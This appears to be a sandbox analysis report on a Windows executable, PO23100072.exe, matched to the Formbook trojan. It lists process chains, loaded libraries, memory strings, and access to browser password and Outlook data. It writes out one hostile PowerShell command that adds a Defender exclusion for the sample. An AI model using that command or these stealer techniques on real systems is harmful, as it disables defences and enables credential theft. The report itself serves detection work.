            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 0372B970 appears 280 times
            Source: C:\Windows\SysWOW64\userinit.exeCode function: String function: 037AEA12 appears 86 times
            Source: PO23100072.exe, 00000000.00000002.1495354166.0000000007720000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1482712855.0000000003D9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1494943777.0000000006D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO23100072.exe
            Source: PO23100072.exe, 00000000.00000002.1478098149.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660702317.00000000014EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO23100072.exe
            Source: PO23100072.exe, 00000005.00000002.1660923291.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO23100072.exe
            Source: PO23100072.exeBinary or memory string: OriginalFilenameZlbU.exe8 vs PO23100072.exe
            Source: PO23100072.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: PO23100072.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, cEpaBxiqWvHD9jf5MO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cEpaBxiqWvHD9jf5MO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/7@18/11
            Source: C:\Users\user\Desktop\PO23100072.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100072.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_03
            Source: C:\Users\user\Desktop\PO23100072.exeMutant created: \Sessions\1\BaseNamedObjects\EifhgLHuzhcTLjGSEx
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqk4ot4k.0ij.ps1Jump to behavior
            Source: PO23100072.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO23100072.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO23100072.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: userinit.exe, 00000009.00000002.3905231115.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3905231115.0000000003186000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1906099501.0000000003186000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1908356674.0000000003192000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1905920458.0000000003165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO23100072.exeReversingLabs: Detection: 52%
            Source: unknownProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\PO23100072.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO23100072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO23100072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO23100072.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrMKpuEiehQ.exe, 00000007.00000002.3904795319.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730386848.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdb source: PO23100072.exe
            Source: Binary string: wntdll.pdb source: PO23100072.exe, PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdbSHA256X{_ source: PO23100072.exe
            Source: Binary string: userinit.pdbGCTL source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: PO23100072.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.PO23100072.exe.6cc0000.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.2b39890.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.cs.Net Code: AdswuQHbIi System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.cs.Net Code: AdswuQHbIi System.Reflection.Assembly.Load(byte[])
            Source: 9.2.userinit.exe.3dccd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 10.2.FrMKpuEiehQ.exe.306cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 10.0.FrMKpuEiehQ.exe.306cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
